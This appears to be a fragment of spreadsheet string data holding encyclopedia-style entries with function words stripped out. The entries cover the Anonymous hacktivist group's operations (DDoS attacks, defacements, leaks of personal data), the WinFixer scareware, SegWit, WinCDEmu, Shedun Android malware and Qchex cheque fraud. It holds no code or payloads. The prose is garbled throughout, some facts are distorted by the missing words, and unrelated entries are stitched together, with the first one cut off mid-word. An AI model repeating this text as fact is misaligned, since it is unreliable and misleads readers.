websites, prank calls, black faxes scientology centers. january 2008, individuals claiming speak anonymous announced goals intentions video posted youtube entitled "message scientology" press release declaring "war scientology" church scientology religious technology center. press release, group states attacks church scientology continue order protect right freedom speech believe financial exploitation church members. video "call action" appeared youtube january 2008, calling protests outside church scientology centers february 2008. february 2008, people gathered outside church scientology center orlando, florida protest organization's practices. small protests also held santa barbara, california, manchester, england. february 2008, 7000 people protested cities worldwide. many protesters wore masks based character vendetta (who, turn, influenced fawkes), otherwise disguised identities, part protect reprisals church.anonymous held second wave protests march 2008, cities world, including boston, dallas, chicago, angeles, london, paris, vancouver, toronto, berlin, dublin. global turnout estimated "between 7000 8000", number similar first wave. third wave protests took place april 2008. named "operation reconnect", aimed increase awareness church scientology's disconnection policy.on october 2008, 18-year-old jersey described member anonymous, stated would plead guilty involvement january 2008 ddos attacks church scientology websites.protests continued, taking advantage media events premiere cruise movie valkyrie, venue chosen part reduce exposure protests. epilepsy foundation forum invasion march 2008, wired news reported "internet griefers"—a slang term people whose interests harassing others—assaulted epilepsy support forum epilepsy foundation america. javascript code flashing computer animations posted intention triggering migraine headaches seizures photosensitive pattern-sensitive epileptics. according wired news, circumstantial evidence suggested attack perpetrated anonymous users, initial attack posts epilepsy forum blaming ebaum's world. members epilepsy forum claimed found thread attack planned 4chan.org, imageboard described stronghold anonymous. thread, like threads eventually types imageboards, since cycled deletion.news.com.au reported administrators 4chan.org posted open letter claiming attacks carried church scientology ruin public opinion anonymous, lessen effect lawful protests virulent organization" church's fair game policy. defacement sohh allhiphop websites late june 2008, users identified anonymous claimed responsibility series attacks sohh (support online hop) website. attack reported begun retaliation insults made members sohh's "just bugging out" forum members anonymous. attack website took place stages, anonymous users flooded sohh forums, shut down. june 2008, group identified anonymous organized ddos attacks website, successfully eliminating website's service capacity. june 2008, hackers utilized cross-site scripting deface website's main page satirical nazi images headlines referencing numerous racial stereotypes slurs, also successfully stole information sohh employees. following defacement, website temporarily shut administration. allhiphop, unrelated website, also forum raided. sarah palin email hack shortly midnight september 2008, private yahoo! mail account sarah palin hacked 4chan user. hacker, known "rubico", claimed read palin's personal e-mails looking something "would derail campaign". after reading palin's emails, rubico wrote, "there nothing there, nothing incriminating personal stuff, clerical stuff governor." rubico wrote used sarah palin wikipedia article find palin's birth date (one standard security questions used yahoo!.) seconds". hacker posted account's password /b/, image board 4chan, screenshots within account wikileaks. user logged changed password, posting screenshot sending email friend palin's informing password thread. however, blank password screenshot. multitude users attempted password, account automatically locked yahoo!. incident criticized users, complained "seriously, /b/. could changed history failed, epically." 2009 cussing club january 2009, members anonymous targeted south pasadena, california teen mckay hatch runs cussing club, website profanity. hatch's home address, phone number, personal information leaked internet, family received hate mail, obscene phone calls, bogus pizza pornography deliveries. 2009 iranian election protests following allegations vote rigging results june 2009 iranian presidential election announced, declaring iran's incumbent president mahmoud ahmadinejad winner, thousands iranians participated demonstrations. anonymous, together pirate various iranian hackers, launched iranian green movement support site called anonymous iran. site drawn 22,000 supporters worldwide allows information exchange world iran, despite attempts iranian government censor news riots internet. site provides resources support iranians protesting. operation didgeridie september 2009, group reawakened order protect civil rights" several governments began block access imageboards. blacklisting krautchan.net germany infuriated many, tipping point australian government's plans isp-level censorship internet. policy spearheaded stephen conroy driven aggressively rudd government since election 2007. early evening september anonymous took prime minister's website distributed denial-of-service attack. site taken offline approximately hour. 2010 operation titstorm occurred february 2010, protest australian government forthcoming internet filtering legislation perceived censorship pornography small-breasted women (who perceived age) female ejaculation. hours earlier, anonymous uploaded video message youtube, addressed kevin rudd, seven news, presenting list demands threats action met. protest consisted distributed denial-of-service attack (ddos) australian government websites. australian anti-censorship groups complained attack hurt cause, australian government members dismissed attack said would restore service attack finished. analysis attacks cited peak bandwidth 17mbit, figure considered small compared ddos attacks. oregon party raid july 2010, reaction anonymous' slogans oregon party. party's facebook page flooded image macro flames. within hours, party posted message saying "anonymous: appreciate resources admire tactics. taught know. requested, longer using 'anonymous' quote." following raid, party's facebook page removed, ning page limited member-only access. operations payback, avenge assange, bradical 2010, several bollywood companies hired aiplex software launch ddos attacks websites respond software takedown notices. file sharing activists created operation payback september 2010 retaliation. original plan attack aiplex software directly, upon finding hours planned ddos another individual taken firm's website own, operation payback moved launching attacks websites copyright stringent organizations, firms websites. this grew multiple ddos attacks anti-piracy groups firms. april 2011, anonymous launched attack media giant sony, named #opsony, part operation payback. anonymous claims attack success took playstation network related playstation websites. anonymous' actions also included personal harassment employees families. playstation network subsequently lengthy outages, although anonymous claims officially sanctioned action part, sub-groups anonymous.sony corp. came anonymous' attention took legal action george hotz (a.k.a. geohot), coder behind popular tool allows homebrew software playstation (ps3). sony also taking legal action alexander egorenkov (aka graf_chokolo) efforts restore linux ps3. reason hotz egorenkov follows sony's decision remove system's otheros feature, enabled linux. while pair earned respect research technical skills, also gained attention sony's legal team. with lawsuit hotz attracted attention anonymous. they claim sony breaching free speech border, reason actions.in december 2010, document archive website wikileaks (used whistleblowers) came intense pressure stop publishing secret united states diplomatic cables. response, anonymous announced support wikileaks, operation payback changed focus support wikileaks launched ddos attacks amazon, paypal, mastercard, visa swiss bank postfinance, retaliation perceived anti-wikileaks behavior. this second front december offensive performed codename operation avenge assange. attacks, mastercard visa's websites brought december threat researcher pandalabs said anonymous also launched attack brought swedish prosecutor's website wikileaks founder julian assange arrested london refused bail relation extradition sweden.after suspected leaker chelsea manning transferred marine corps brig, quantico july 2010, allegations abuse arose around manning's isolation maximum security area, suicide-watch included constant verbal checks guards forced nudity. military officials denied treatment abuse abnormal. event resignation, state department spokesman philip crowley made statements condemning treatment. response manning's imprisonment treatment, anonymous threatened disrupt activities quantico cyber-attacking communications, exposing private information personnel, harassment methods. dubbed "operation bradical", spokesperson journalist barrett brown stated would direct response alleged mistreatment. military spokespersons responded threat referred enforcement counterterrorism officials requested investigation. operation leakspin operation: leakspin purpose sorting wikileaks releases identify potentially overlooked cables. zimbabwe websites government zimbabwe targeted anonymous censorship wikileaks documents. visa, mastercard, paypal anonymous launched several denial-of-service attacks visa, mastercard paypal companies cutting services wikileaks. 2011 attack fine gael website website irish political party, centre right party coalition government labour party, hacked anonymous 2011 general election campaign according thejournal.ie. site replaced page showing anonymous logo along words "nothing safe, faith political party take measures protect you. they offer free speech censor voice. wake &lt;owned raepsauce palladium&gt;". arab spring activities websites government tunisia targeted anonymous censorship wikileaks documents tunisian revolution. tunisians reported assisting denial-of-service attacks launched anonymous. anonymous's role ddos attacks tunisian government's websites upsurge internet activism among tunisians government. figure associated anonymous released online message denouncing government clampdown recent protests posted tunisian government website. anonymous named attacks "operation tunisia". anonymous successfully performed ddos attacks eight tunisian government websites. tunisian government responded making websites inaccessible outside tunisia. tunisian police also arrested online activists bloggers within country questioned attacks. anonymous's website suffered ddos attack january 5.during 2011 egyptian revolution, egyptian government websites, along website ruling national democratic party, hacked taken offline anonymous. sites remained offline president hosni mubarak stepped down.anonymous divided 2011 libyan civil war, hacked libyan government websites, persuaded host libyan leader muammar gaddafi's personal website take down, members group sided dictator called "operation reasonable reaction". pro-gaddafi attacks fairly unsuccessful, managing take minor opposition sites little while.anonymous also released names passwords email addresses middle eastern governmental officials, support arab spring. countries targeted included officials bahrain, egypt, jordan, morocco. attack hbgary federal weekend february 5–6, 2011, aaron barr, chief executive security firm hbgary federal, announced firm successfully infiltrated anonymous group, although would hand details police, would reveal findings later conference francisco. retaliation aaron barr's claims, members group anonymous hacked website hbgary federal replaced welcome page message stating anonymous messed with, hacking website necessary defend itself. using variety techniques, including social engineering injection, anonymous also went take control company's e-mail, dumping 68,000 e-mails system, erasing files, taking phone system. leaked emails revealed reports company presentations companies computer security endgame systems promise high quality offensive software, advertising "subscriptions $2,500,000 year access 0day exploits".among documents exposed powerpoint presentation entitled "the wikileaks threat", together hbgary federal along data intelligence firms bank america december. within report, firms created list important contributors wikileaks; developed strategic plan attack site. techherald explains, "the plan included pressing journalist order disrupt support organization, cyber attacks, disinformation, potential proactive tactics." report specifically claims glenn greenwald's support wikileaks' ongoing survival.anonymous also personally attacked aaron barr taking control twitter account, posting barr's supposed home address social security number.in response attacks, founder hbgary federal, greg hoglund, responded journalist brian krebs, "they pick company, protect government hackers. they chosen worse company pick on." after attacks, anonymous continued clog hbgary federal machines, made threatening phone calls. operation ouroboros february 2011, group supposedly wrote open letter westboro baptist church, stating: "cease desist protest campaign year 2011... close public sites. should ignore warning... propaganda detestable doctrine promote eradicated; damage incurred irreversible, neither institution congregation ever able fully recover." february 2011, church responded, telling anonymous "bring calling them, among things, puddle pimple-faced nerds". anonymous subsequently denied authenticity threat, suggesting someone outside anonymous made posting. website openly editable anyone, unknown made post time. anonymous responded press release calling westboro church "professional trolls" stating believe member westboro church making attempt provoke attack, thus acting honeypot would allow church retaliate internet service providers court, gain publicity. they also claimed pressing matters attend namely support protests 2011 libyan civil war. that said, anonymous later suggested tactics wished attack westboro nevertheless, avoiding ddos favor sending "prostitutes, preferably male", general "rape asses unpredictable ways possible". anonymous also indicated attack would self-defeating, stating: "when anonymous says support free speech, mean count beatrice hall among anonymous forebears: disapprove say, defend death right it.'" nonetheless, westboro's website godhatesfags.com suffered attack. another hacktivist name jester claimed bring websites westboro baptist church twitter account. nonetheless, people still unsure actually attacked westboro baptist church. thread 4chan, several members revealed confusion wondered jester's motives. 2011 wisconsin protests february 2011, anonymous announced attack koch industries response wisconsin protests. between 1997 2008, david charles koch collectively gave million groups, americans prosperity, club growth citizens united, lobbying unions. kochs (republican) governor walker's largest corporate supporters. anonymous accused brothers attempting usurp american democracy" called boycott koch industries products. 2011–2012 operation empire state rebellion march 2011, group anonymous began releasing emails said obtained bank america. according group, files show evidence "corruption fraud", relate issue improper foreclosures. they former employee named brian penny balboa insurance, firm used owned bofa, appeared reputable insider force placed insurance market, market which, 2012, began getting coverage various government media sources, including york department finance, state attorney general coalition, consumer financial protection bureau, large class action lawsuits. balboa insurance owned australian reinsurance company qbe, brian privately consults various agencies institutions inside workings mortgage/insurance tracking systems force placed insurance maintaining blog experience whistleblower. operation sony anonymous announced intent attack sony websites response sony's lawsuit george hotz and, specifically sony's gaining access addresses people visited george hotz's blog part libel action, terming 'offensive free speech internet freedom' although anonymous admitted responsibility subsequent attacks sony websites, anonymous branch anonops denied cause behind major outage playstation network april 2011. however, anonymous leaderless organization, possibility remains another branch group responsible outage, though screenshots anonops promotion attack still exist. spanish police june 2011, ddos attack website spanish police, starting 21:30 gmt. anonymous claimed responsibility following day, stating attack "direct response friday arrests three individuals alleged associated acts cyber civil disobedience attributed anonymous." site approximately hour result efforts. operation india group come support civil movement corruption india. this cyber movement named 'operation india'. operation malaysia june 2011, group launched attacks ninety-one websites malaysian government response blocking websites like wikileaks pirate within country, group labels censorship basic human right information. operation orlando june 2011, members group took websites orlando, florida chamber commerce inserted message website universal orlando resort requesting users "boycott orlando". group response arrests members food bombs feeding homeless lake eola park city ordinances. group planned announced attack channel. group vowed take different orlando-related website offline every day, also targeted re-election website mayor orlando buddy dyer orlando international airport. member group left fawkes mask outside mayor's home; police treating picture taken mask threat mayor. july group took website roman catholic diocese orlando rotary club orlando. operation intifada june 2011, anonymous announced within next hours, would hack website knesset, legislature israel, knock offline. stated planned attacks response alleged hacking attacks israeli intelligence stuxnet virus, computer virus allegedly created israeli u.s. intelligence targeted iranian nuclear program. operation anti-security group collaborated lulzsec hack websites number government corporate sources release information them. well targeting american sites, anonymous also targeted government sites tunisia, anguilla, brazil, zimbabwe, turkey, australia. july anonymous released pdfs allegedly taken nato. operation facebook august 2011, someone created account twitter name op_facebook announced "operation facebook". according links post, anonymous going take facebook november 2011. date "november believed attributed comics vendetta, character conducts major plans every fifth november memory fawkes. this operation assuredly anonymous one. there earlier opfacebook abandoned, current plan revival communication channels previously used. plan contentious appear supported majority part anonymous. operation facebook, popular belief, never showed signs itself. facebook continued supposed operation facebook begin. day, anonymous tweeted never announced operation facebook guy's idea joke. operation bart august 2011, response area rapid transit's shutdown cell phone service attempt disconnect protesters assembling response police shooting, well shooting itself, anonymous sent mass email/fax bomb bart personnel organized multiple mass physical protests network's civic center station. anonymous also hacked bart website, releasing personal information bart police officers, well account information 2,000 customers. shooting sheriffs saturday event dubbed "shooting sheriffs saturday," anonymous hacked (mostly rural) enforcement websites released leaked information. name likely reference song shot sheriff" marley. support occupy wall street several contingents anonymous given support occupy wall street movement, members attending local protests blogs members covering movement. operation syria early august, anonymous hacked syrian defense ministry website replaced vector image pre-ba'athist flag, symbol pro-democracy movement country, well message supporting 2011 syrian uprising calling members syrian army defect protect protesters. operation darknet october 2011, collective campaigned child pornography protected anonymous hosting techniques. they temporarily ddosed child porn sites, published usernames 1500 people frequenting websites, invited u.s. federal bureau investigation interpol follow opposition zetas october 2011, anonymous released video stating zetas kidnapped group's members, threatened unless hostage freed, would publish personal information members cartel collaborators politics, police, military, business, might lead prosecution mexican authorities, targeting rival cartels. website gustavo rosario torres, former tabasco state prosecutor, subsequently defaced message suggesting involvement organization. early november, zetas reportedly freed kidnapped victim without knowledge anonymous affiliation, announced anonymous iberoamerica blog. however, following widespread news coverage video, reporters find evidence previous anonymous action matching description given, found little evidence support among anonymous members, particularly mexico. many blogs members anonymous also report this. operation brotherhood takedown november 2011, anonymous released warning threat muslim brotherhood would take major websites belonging organization. november muslim brotherhood released statement detailing extent attack four websites temporarily taken down. november 2011, another video released claiming attack would continue november john pike incident response davis pepper-spray incident, anonymous released personal information john pike, officer pepper-sprayed peaceful protestors. attack stratfor december claims made anonymous stole thousands e-mail addresses credit card information security firm stratfor. reportedly, anonymous commented data unencrypted, however anonymous press-release stating "this hack definitely work anonymous". operation pharisee operation pharisee attack organized social media facebook, twitter, youtube vatican website world youth 2011. unsuccessful, despite denial-of-service attack resulting times normal traffic, well-documented efforts imperva, security firm employed vatican. operation deepthroat anonymous, along 4chan's board, reddit, twitter funnyjunk, teamed together make raid 9gag called operation deepthroat. raid separated multiple teams: first team, alpha team, spammed "horrifying" images child pornography, gore, furries scat 9gag's site, followed fake accounts made 4chan, anonymous, reddit, twitter funnyjunk voting spam effectively overloading servers. second team, gold team, used orbit cannon high orbit cannon (loic hoic, respectively), fired 9gag, ddos'd entire site down. third team, team, tasked spread information 4chan, reddit, twitter funnyjunk, also supported teams. fourth final team, white team, tasked spamming chat sites omegle chatroulette inappropriate messages, "9gag.com place child pornography!", order tarnish 9gag's "wholesome" "family-friendly" name. reason behind whole operation began 9gag took several 4chan's memes called theirs, followed making legion called '9gag army', ripoff anonymous. operation began december 2011, 12:00 ended 11:59 9gag mainly offline next days, except servers managed protect loic hoic. prior operation, 4chan users used fake accounts trick 9gaggers ddos'ing themselves, saying coordinates 4chan. pre-raid attack mostly ineffective, however, servers went down. 2012 cslea hack january 2012, anonymous hacked website california statewide enforcement association protest police brutality. occupy nigeria solidarity occupy nigeria, anonymous joined forces people's liberation front naija cyber hactivists nigeria. anonymous promised relentless devastating assault upon assets nigerian government" support occupy nigeria. this protest removal fuel subsidy majority impoverished nigerians depend upon existence, causing price fuel transportation skyrocket therefore extreme hardship majority nigerians. january nigerian economic financial crimes commission website hacked, false report arrest people involved sector replacing normal page. operation megaupload retaliation shut file sharing service megaupload arrest four workers, anonymous ddosed websites (the company responsible lawsuit megaupload), united states department justice, united states copyright office, federal bureau investigation, mpaa, warner brothers music, riaa, hadopi afternoon january 2012. operations anonymous speculated driven anger house representatives' stop online piracy (sopa) senate's protect intellectual property (pipa). anti-acta activism europe january 2012, series ddos attacks polish government websites took place, anonymous took responsibility referred "the polish revolution". group twitter account stated revenge upcoming signing acta agreement polish government. starting websites sejm, polish prime minister, president, ministry culture national heritage, later websites police, internal security agency, ministry foreign affairs also blocked. presumed attack strengthened media coverage resulted extremely high interest public opinion, followed blackout popular polish websites 24th protests thousands people january major cities poland, signing acta. other suspected targets websites paweł graś government's spokesman (blocked graś denied attacks ever took place), website (blocked eugeniusz kłopotek, member party, supported acta major station). governmental sites france's presidential website austria's ministry justice, ministry internal affairs, ministry economy also website federal chancellor also cracked paralyzed. anonymous slovenia announced opposition slovenian signing acta posted video threats various websites government officials, well nova ljubljanska banka (commonly known nlb), accusing latter corruption. february 2012, victim cyber attack offline hour, public demonstrations held capital ljubljana maribor. some estimated 3000 people gathered capital, around protested maribor. operation russia unidentified hackers cracked email boxes prominent pro-kremlin activists officials, including vasily yakemenko, head federal agency youth affairs, kristina potupchik, press secretary nashi youth movement, oleg khorokhordin, deputy head department internal affairs presidential administration. since february links contents mailboxes appearing @op_russia twitter account. hackers confirmed consider part anonymous movement; anonymous", stated interview. information discovered enabled many accuse yakemenko colleagues paying influential bloggers, well numerous trolls, publishing stories commenting favour vladimir putin negative press articles internet. boston police department attacks february 2012, anonymous hacked website belonging boston police department protest eviction occupy wall street protestors. later responded sarcastic video own. preventing vote tampering 2012, anonymous claims added firewall called great allegedly designed prevent election tampering united states. syrian government e-mail hack february 2012, anonymous broke mail server syrian ministry presidential affairs, gaining access inboxes bashar al-assad's staffers process. email files document preparing assad december 2011 interview abc's barbara walters. passwords commonly used assad's office accounts "12345."in july 2012, anonymous gave million e-mails wikileaks. antisec leak attack friday, february 2012, anonymous claimed responsibility taking central intelligence agency's website hours. several servers went back others stayed down. this followed conversation leak, anonymous took responsibility, scotland yard officials discussing members anonymous trial well topics group, took place week before. march 2012, donncha o'cearbhaill charged connection leak. released 24-hours later. interpol attack following interpol's announcement february made arrests suspected members hacking activist group anonymous europe south america, site went moment. aipac attack march 2012, anonymous took american israel public affairs committee website. aipac spokesman questioned matter respond. video titled "anonymous: message aipac" uploaded youtube earlier day. vatican website ddos attacks official website vatican brought temporarily ddos attack anonymous march 2012. later website recovered. anonymous also attempted take site 2011 attempt succeed. they claimed attack targeted followers catholic church church itself, anonymous viewed corrupt.on march vatican's official website brought hours second ddos attack. anonymous also hacked vatican radio gained access vatican radio database protest vatican radio allegedly using "repeaters power transmission largely outside bounds law." criticism kony 2012 anonymous described kony 2012 campaign invisible children "propaganda". although support campaign kony, felt campaign mainly scam. bureau justice leak march 2012, 1.7gb data stolen united states bureau justice statistics anonymous. leak reportedly contained "shiny things internal emails entire database dump." judge rotenberg center march 2012, anonymous announced youtube video judge rotenberg center affiliated targets. this came video tortured jrc, special needs school, released cnn. school also legally tortured hundreds others, five died there. anonymous hacked jrc's website publicly posted names addresses jrc's sponsors, lobbyists, lawyers supporters, well founder principal himself, pastebin. taking monsanto's hungarian website march official website monsanto's hungarian website collapsed restored march symantec source code leak march 2012, people claiming part anonymous leaked source code versions norton antivirus norton utilities. april 2012 chinese attack april 2012, anonymous hacked chinese government websites, once, protest treatment citizens. they urged people "fight justice, fight freedom, [and] fight democracy". operation bahrain formula attacks april anonymous defaced official site formula one, protest 2012 bahrain grand prix. race subject ongoing controversy, held ongoing anti-government protests, support government. anonymous posted press release criticising decision hold race despite violent crackdowns, posted data ticket sales event sensitive information particularly credit card numbers spectators redacted. other sites related sport bahraini government also subject distributed denial-of-service attack. occupy philippines april 2012 busabos anonymous philippines attacked china unive</t>
  </si>
  <si>
    <t>WinFixer</t>
  </si>
  <si>
    <t>winfixer family scareware rogue security programs developed winsoftware claimed repair computer system problems microsoft windows computers user purchased full version software. software mainly installed without user's consent. mcafee claimed "the primary function free version appears alarm user paying registration, least partially based false erroneous detections." program prompted user purchase paid copy program.the winfixer page (see image) said useful utility scan system, registry hard drive errors. ensures system stability performance, frees wasted hard-drive space recovers damaged word, excel, music video files." however, claims never verified reputable source. fact, sources considered program actually reduce system stability performance. sites went defunct december 2008 actions taken federal trade commission. installation methods winfixer application known infect users using microsoft windows operating system, browser independent. infection method involved emcodec.e trojan, fake codec scam. another involves vundo family trojans. typical infection infection usually occurred visit distributing website using browser. message appeared dialog popup asking user wanted install winfixer, claimed user's machine infected malware, requested user free scan. when user chose options tried close dialog clicking 'ok' 'cancel' clicking corner 'x'), would trigger pop-up window winfixer would download install itself, regardless user's wishes. "trial" offer free "trial" offer program sometimes found pop-ups. "trial" version downloaded installed, would execute "scan" local machine couple non-existent trojans viruses would "discovered", action would undertaken program. obtain quarantine removal, winfixer required purchase program. however, alleged unwanted bugs bogus, serving persuade owner program. winfixer application once installed, winfixer frequently launched pop-ups prompted user follow directions. because intricate program installed host computer (including making dozens registry edits), successful removal would taken fairly long time done manually. when running, process could found task manager stopped, would automatically relaunch period time. winfixer also known modify windows registry started automatically every reboot, scanned user's computer. firefox popup mozilla firefox browser vulnerable initial infection winfixer. once installed, winfixer known exploit sessionsaver extension firefox browser. program caused popups every startup asking user download winfixer, adding lines containing word 'winfixer' prefs.js file. removal removal winfixer proved difficult actively undid whatever user attempted. frequently, procedures worked system would work another large number variants. some sites provided manual techniques remove infections automated cleanup tools could remove. domain ownership company made winfixer, winsoftware ltd., claimed based liverpool, england (stanley street, postcode: 13088.) however, address proven false.the domain winfixer.com whois database showed owned void company ukraine another warsaw, poland. according alexa internet, domain owned innovative marketing, inc., 1876 hutson honduras. according public certificate provided cybertrust solutions, inc., server secure.errorsafe.com operated errorsafe inc. 1878 hutson street, belize city, running traceroute winfixer domains showed domains hosted servers setupahost.net, used shaw business solutions bigpipe backbone. technical information technical winfixer closely related aurora network's nail.exe hijacker/spyware program. worst-case scenarios, would embed internet explorer become part program, thus nearly impossible remove. program also closely related vundo trojan. variants windows police windows police variant winfixer. david wood wrote microsoft technet march 2009, microsoft malware protection center antivirus, virus' first version. microsoft detect changes virus july year second variant, windows antivirus pro, appeared. although multiple virus versions since appeared, virus renamed once, windows police pro. microsoft added virus malicious software removal tool october 2009.the virus generated numerous persistent popups messages displaying false scan reports intended convince users computers infected various forms malware exist. when users attempted close popup message, received confirmation dialog boxes switched "purchase full version" "continue evaluating" buttons. windows police generated counterfeit windows security center warned users fake malware.bleeping computer syndicated "propeller heads" column recommended using malwarebytes' anti-malware remove windows police permanently. microsoft technet softpedia recommended using microsoft's malicious software removal tool malware. effects public class action lawsuit september 2006, jose woman filed lawsuit winfixer related "fraudware" santa clara county superior court; however, 2007 lawsuit dropped. lawsuit, plaintiffs charged winfixer software "eventually rendered computer's hard drive unusable. program infecting computer also ejected cd-rom drive displayed virus warnings." windows live messenger february 2007, blog called "spyware sucks" reported popular instant messaging application windows live messenger inadvertently promoted winfixer displaying winfixer advertisement messenger's hosts. similar occurrence also reported groups pages. there reports (one patchou, creator messenger plus!), people contacted microsoft incidents. whitney burk microsoft issued problem official statement: microsoft notified malware served placed windows live messenger banners. result notification immediately investigated reports removed offending ads, violation serving policy. confirm longer served microsoft system. apologize inconvenience reviewing approval process reduce chance occurrence happening again. help customers protect malware threats, microsoft recommends customers follow protect guidance www.microsoft.com/protect. federal trade commission december 2008, federal trade commission requested received temporary restraining order innovative marketing, inc., bytehosting internet services, llc, individuals daniel sundin, jain, marc d’souza, kristy ross, james reno, creators winfixer sister products. complaint alleged products' advertising, well products themselves, violated united states consumer protection laws. however, innovative marketing flouted court order fined $8,000 civil contempt.on september 2012, kristy ross fined $163 million federal trade commission part this. article goes winfixer family software simply acknowledge fact program made many computers unusable. notes references external links mcafee's entry winfixer symantec’s entry winfixer removal instructions symantec's entry errorsafe sister spyware application complaint</t>
  </si>
  <si>
    <t>SegWit</t>
  </si>
  <si>
    <t>segregated witness, segwit, name used implemented soft fork change transaction format bitcoin. formal title "segregated witness (consensus layer)" bitcoin improvement proposal number bip141. declared purpose prevent nonintentional bitcoin transaction malleability, allow optional data transmission, bypass certain protocol restrictions (such block size limit) soft fork.it also intended mitigate blockchain size limitation problem reduces bitcoin transaction speed. splitting transaction segments, removing unlocking signature ("witness" data) original portion appending separate structure end. original section would continue hold sender receiver data, "witness" structure would contain scripts signatures. original data segment would counted normally, "witness" segment would, effect, counted quarter real size. history block size limit bitcoin cryptocurrency, form money using cryptography keep transactions secure. each record unit bitcoins called "block", blocks tied together sequentially using cryptographic hash previous block storing output next. this forms chain blocks, blockchain.each block contains information sends receives given unit bitcoin transaction), well signature approves transaction. originally, limit size blocks. however, allowed malicious actors make fake "block" data long form denial-of-service attack (dos attack). these fake blocks would detected, would take long time, slowing whole system. scalability malleability current bitcoin blockchain design regarded shortcomings. scalability block added chain random intervals averaging, design, minutes (proof-of-work causes delay). together limit block-size, limits number transactions processed given time. some sites work around problem using "off-chain payments" conducting transactions without writing blockchain, involves various trade offs regarding trust transaction finality. others proposed changes bitcoin would reform blockchain format backward-incompatible way. example, flextrans (flexible transactions) would make transactions smaller changing described "tag" system, allowing transactions block. this compatible systems upgrade. segregated witnesses solution signature data called witness would separated merkle tree record sending receiving bitcoins. witness data moved end, byte would count quarter "unit". also addresses signature malleability, serializing signatures separately rest transaction data, transaction longer malleable. activation july 2017, bitcoin miners locked-in software upgrade referred bitcoin improvement proposal (bip) meaning segregated witness upgrade activated block 477,120. segwit alleviates scaling problem ways: segwit solves transaction malleability, thereby enabling lightning network, overlay network micropayment channels, hypothetically resolving scaling problem enabling virtually unlimited numbers instant, low-fee transactions occur "off chain".by august, another milestone reached 100% bitcoin mining pools signaled support segwit, although segwit would fully activated august earliest, miners would begin rejecting blocks support segwit. initially, bitcoin transactions able upgrade. segregated witness activated august 2017. bitcoin price rose almost week following segwit's activation. july 2017, bitcoin trading $2,748, july 2017's $1,835.in first week october, proportion network transactions using segwit rose 10%, indicating increase rate. small group mostly china-based bitcoin miners, unhappy bitcoin's proposed segwit improvement plans, pushed forward alternative plans split created bitcoin cash.as february 2018, segwit transactions exceed 30%. segwit2x segregated witness (bip141) confused segwit2x (segwit2mb). 2017, digital currency group (not confused digital currency initiative media lab) announced offered proposal, referred segwit2x ("the york agreement"), activating segregated witness threshold total bitcoin hash rate, signaling activating block size limit within months support excess total bitcoin hash rate.as mid-2017, although segwit2x proposal support excess hashrate, however, segwit2x proposal controversial work project limited invitation group developers. mid-july 2017, became apparent miners supported implementation segwit part agreement august 2017 uasf, thereby attempting avoid risk hard fork bitcoin network.on november 2017, developers segwit2x announced hard fork planned around november 2017 canceled lack consensus. related bips bip141 segregated witness (consensus layer) activated august 2017 bip143 transaction signature verification version witness program activated august 2017 bip144 segregated witness (peer services) activated august 2017 bip148 mandatory activation segwit deployment activated (mandated activation bip141, 143, 144) references</t>
  </si>
  <si>
    <t>WinCDEmu</t>
  </si>
  <si>
    <t>wincdemu open-source utility mounting disk image files microsoft windows. installs windows device driver allows user access image physical drive. wincdemu supports iso, cue/bin, ccd/img, nrg, mds/mdf formats. language support wincdemu supports languages: arabic, bengali, bulgarian, catalan, chinese simplified, chinese traditional, danish, dutch, english, estonian, persian, finnish, french, german, greek, hebrew, hungarian, italian, japanese, korean, lithuanian, macedonian, malaysian, norwegian, polish, portuguese (brazil), portuguese, romanian, russian, slovak, spanish, serbian, swedish, taiwanese, tamil, turkish, ukrainian, uzbek external links official website references</t>
  </si>
  <si>
    <t>Shedun</t>
  </si>
  <si>
    <t>shedun family malware software (also known kemoge, shiftybug shuanet) targeting android operating system first identified late 2015 mobile security company lookout, affecting roughly 20,000 popular android applications. lookout claimed hummingbad malware also part shedun family, however, claims refuted.avira protection labs stated shedun family malware detected cause approximately 1500-2000 infections day. three variants virus known share roughly ~80% source code.in 2016, arstechnica reported approximately 10.000.000 devices would infected malware infections would still surging.the malware's primary attack vector repackaging legitimate android applications (e.g. facebook, twitter, whatsapp, candy crush, google now, snapchat) adware included. remains functional released third party store; downloaded, application generates revenue serving (estimated amount installation), users cannot virus without getting device, malware root affected devices re-flash custom rom.in addition, shedun-type malware detected pre-installed different types chinese android-based hardware smartphones tablet computers.shedun-family malware known auto-rooting android using well-known exploits like exynosabuse, memexploit framaroot (causing potential privilege escalation) serving trojanized adware installing within system partition operating system, even factory reset remove malware infected devices.shedun malware known targeting android accessibility service, well downloading installing arbitrary applications (usually adware) without permission. classified "aggressive adware" installing potentially unwanted program applications serving ads.as april 2016, shedun malware considered security researchers next impossible entirely remove.avira security researcher pavel ponomariov, specializes android malware detection tools, mobile threat detection, mobile malware detection automation research, published in-depth analysis malware. also brain test dendroid (malware) computer virus file binder individual mobility malware trojan horse (computing) worm (computing) mobile operating system references</t>
  </si>
  <si>
    <t>Qchex</t>
  </si>
  <si>
    <t>qchex website allowed people create send checks drawn bank long provided routing transit number account number valid email address. "qchex" could e-mailed printed recipients. september 2006, united states district judge william hayes, responding federal trade commission lawsuit alleging qchex's practice e-mailing personal checks without verifying identity check-writers resulted widespread fraud, ordered practice halted. said received complaints consumers practice used fraudulently withdraw money accounts, including using federal agencies, like itself.qchex's website advised people register qchex ensure else access account numbers qchex system."in september 2005, stated qchex's security practices haphazard ineffective. qchex continued refuse verification procedures, continued offer service despite ftc's involvement complaints consumers reported accounts illegally debited. sept. 2006 qchex suspended service notice agreement response request. defendants named case neovi inc., business neovi data corp. qchex.com; productivity systems inc., business qchex.com; principals, james danforth thomas villwock. defendants based diego, calif. also internet fraud fraud references external links qchex website what with qchex checks, article justin pritchard about.com easy check fraud technique draws scrutiny, article sullivan, msnbc</t>
  </si>
  <si>
    <t>WinAntiVirus</t>
  </si>
  <si>
    <t>Quad9</t>
  </si>
  <si>
